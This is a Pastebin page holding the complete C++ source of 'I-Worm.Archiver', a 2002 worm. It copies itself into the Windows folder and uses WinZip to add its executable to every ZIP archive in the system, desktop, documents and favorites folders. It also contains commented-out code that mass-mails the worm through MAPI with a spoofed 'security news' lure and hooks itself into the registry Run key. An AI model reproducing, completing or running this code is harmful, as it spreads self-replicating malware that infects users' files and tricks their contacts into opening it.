Advertisement
FlyFar

I-Worm.Archiver - Source Code

Feb 19th, 2023 (edited)
734
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 6.07 KB | Cybersecurity | 0 0
  1. /*
  2. Name : I-Worm.Archiver
  3. Author : PetiK
  4. Date : Mai 10th 2002 -
  5. Language : C++
  6.  
  7. Comments : Infect ZIP files which run with WINZIP.
  8.  
  9.         We can also to do the same think with PowerArchiver:
  10.             powerarc -a -c4 archive.zip virus.exe
  11.  
  12. */
  13.  
  14. #include <windows.h>
  15. #include <stdio.h>
  16. #include <mapi.h>
  17.  
  18. #pragma argused
  19. #pragma inline
  20.  
  21.  
  22. char    filen[100],copyn[100],copyreg[100],windir[100],sysdir[100],inzip[256],fsubj[50];
  23. char    *fnam[]={"news","support","info","newsletter","webmaster"};
  24. char    *fmel[]={"@yahoo.com","@hotmail.com","@symantec.com","@microsoft.com","@avp.ch","@viruslist.com"};
  25. LPSTR   run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
  26.     SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
  27. char    attname[]="news_xxxxxxxx.exe";
  28. LPTSTR  cmdLine,ptr;
  29. BOOL    installed;
  30. BYTE    desktop[50],favoris[50],personal[50],winzip[50];
  31. DWORD   sizdesktop=sizeof(desktop),sizfavoris=sizeof(favoris),
  32.     sizpersonal=sizeof(personal),sizwinzip=sizeof(winzip);
  33. DWORD   type=REG_SZ;
  34. long    i;
  35.  
  36. LHANDLE session;
  37. MapiMessage *mes;
  38. MapiRecipDesc from;
  39. char messId[512],mname[50],maddr[30];
  40. HINSTANCE hMAPI;
  41.  
  42. HKEY        hReg;
  43. WIN32_FIND_DATA ffile;
  44.  
  45. void infzip(char *);
  46.  
  47. ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
  48. ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
  49. ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
  50. ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
  51. ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
  52. ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);
  53.  
  54. int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
  55. {
  56.  
  57. GetModuleFileName(hInst,filen,100);
  58. GetSystemDirectory((char *)sysdir,100);
  59. GetWindowsDirectory((char *)copyn,100);
  60. strcpy(windir,copyn);
  61. strcat(copyn,"\\Archiver.exe");
  62.  
  63. installed=FALSE;
  64. cmdLine=GetCommandLine();
  65. if(cmdLine) {
  66.     for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
  67.     if(ptr[0]=='-' && ptr[1]!=0) {
  68.         switch(ptr[1]) {
  69.             default:
  70.             break;
  71.             case 'i':
  72.                 installed=TRUE;
  73.                 break;
  74.             case 'p':
  75.                 ShellAbout(0,"I-Worm.Archiver","Copyright (c)2002 - PetiKVX",0);
  76.                 MessageBox(NULL,"This new Worm was coded by PetiK.\nFrance - (c)2002",
  77.                     "I-Worm.Archiver",MB_OK|MB_ICONINFORMATION);
  78.                 ExitProcess(0);
  79.                 break;
  80.             }
  81.         }
  82.     }
  83.  
  84. if(!installed) {
  85. CopyFile(filen,copyn,FALSE);
  86. strcpy(copyreg,copyn);
  87. strcat(copyreg," -i");
  88. /* RegOpenKeyEx(HKEY_LOCAL_MACHINE,run,0,KEY_WRITE,&hReg);
  89. RegSetValueEx(hReg,"Archiver",0,REG_SZ,(BYTE *)copyreg,100);
  90. RegCloseKey(hReg); */
  91. ExitProcess(0);
  92. }
  93.  
  94. RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
  95. RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
  96. RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
  97. RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
  98. RegCloseKey(hReg);
  99. RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hReg);
  100. RegQueryValueEx(hReg,NULL,0,&type,winzip,&sizwinzip);
  101. RegCloseKey(hReg);
  102.  
  103. if(strlen(winzip)!=0) {
  104. infzip(windir);
  105. infzip(sysdir);
  106. infzip(desktop);
  107. infzip(personal);
  108. infzip(favoris);
  109. infzip("C:\\");
  110. }
  111.  
  112. /*
  113. _asm
  114. {
  115. call    @wininet
  116. db  "WININET.DLL",0
  117. @wininet:
  118. call    LoadLibrary
  119. test    eax,eax
  120. jz  end_asm
  121. mov ebp,eax
  122. call    @inetconnect
  123. db  "InternetGetConnectedState",0
  124. @inetconnect:
  125. push    ebp
  126. call    GetProcAddress
  127. test    eax,eax
  128. jz  end_wininet
  129. mov edi,eax
  130. verf:
  131. push    0
  132. push    Tmp
  133. call    edi
  134. dec eax
  135. jnz verf
  136.  
  137. end_wininet:
  138. push    ebp
  139. call    FreeLibrary
  140. end_asm:
  141. jmp end_all_asm
  142.  
  143. Tmp dd 0
  144.  
  145. end_all_asm:
  146. }
  147.  
  148.  
  149. hMAPI=LoadLibrary("MAPI32.DLL");
  150. (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
  151. (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
  152. (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
  153. (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
  154. (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
  155. (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
  156. mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
  157. if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
  158.   do {
  159.      if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
  160.     strcpy(mname,mes->lpOriginator->lpszName);
  161.     strcpy(maddr,mes->lpOriginator->lpszAddress);
  162.  
  163.     for(i=0;i<8;i++)
  164.     attname[i+5]='1'+(char)(9*rand()/RAND_MAX);
  165.     fsubj[0]=0;
  166.     wsprintf(fsubj,"News from %s%s",fnam[GetTickCount()%4],fmel[GetTickCount()%5]);
  167.  
  168.  
  169.     mes->ulReserved=0;
  170.     mes->lpszSubject=fsubj;
  171.     mes->lpszNoteText="This is some news send by our firm about security.\n"
  172.                 "Please read by clicking on attached file.\n"
  173.                 "\tBest Regards";
  174.     mes->lpszMessageType=NULL;
  175.     mes->lpszDateReceived=NULL;
  176.     mes->lpszConversationID=NULL;
  177.     mes->flFlags=MAPI_SENT;
  178.     mes->lpOriginator->ulReserved=0;
  179.     mes->lpOriginator->ulRecipClass=MAPI_ORIG;
  180.     mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
  181.     mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
  182.     mes->nRecipCount=1;
  183.     mes->lpRecips->ulReserved=0;
  184.     mes->lpRecips->ulRecipClass=MAPI_TO;
  185.     mes->lpRecips->lpszName=mname;
  186.     mes->lpRecips->lpszAddress=maddr;
  187.     mes->nFileCount=1;
  188.     mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
  189.     memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
  190.     mes->lpFiles->ulReserved=0;
  191.     mes->lpFiles->flFlags=NULL;
  192.     mes->lpFiles->nPosition=-1;
  193.     mes->lpFiles->lpszPathName=filen;
  194.     mes->lpFiles->lpszFileName=attname;
  195.     mes->lpFiles->lpFileType=NULL;
  196.     mSendMail(session, NULL, mes, NULL, NULL);
  197.     }
  198.   }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
  199. free(mes->lpFiles);
  200. mFreeBuffer(mes);
  201. mLogoff(session,0,0,0);
  202. FreeLibrary(hMAPI);
  203. }
  204.  
  205. */
  206.  
  207. ExitProcess(0);
  208. }
  209.  
  210. void infzip(char *folder)
  211. {
  212. register bool abc=TRUE;
  213. register HANDLE fh;
  214. if(strlen(folder)!=0) {
  215. SetCurrentDirectory(folder);
  216. fh=FindFirstFile("*.zip",&ffile);
  217. if(fh!=INVALID_HANDLE_VALUE) {
  218.     while(abc) {
  219.     inzip[0]=0;
  220.     wsprintf(inzip,"%s -a -r %s %s",winzip,ffile.cFileName,copyn);
  221.     WinExec(inzip,1);
  222.     abc=FindNextFile(fh,&ffile);
  223.     }
  224. }
  225. }
  226.  
  227. }
Advertisement
Comments
Add Comment
Please, Sign In to add comment
Advertisement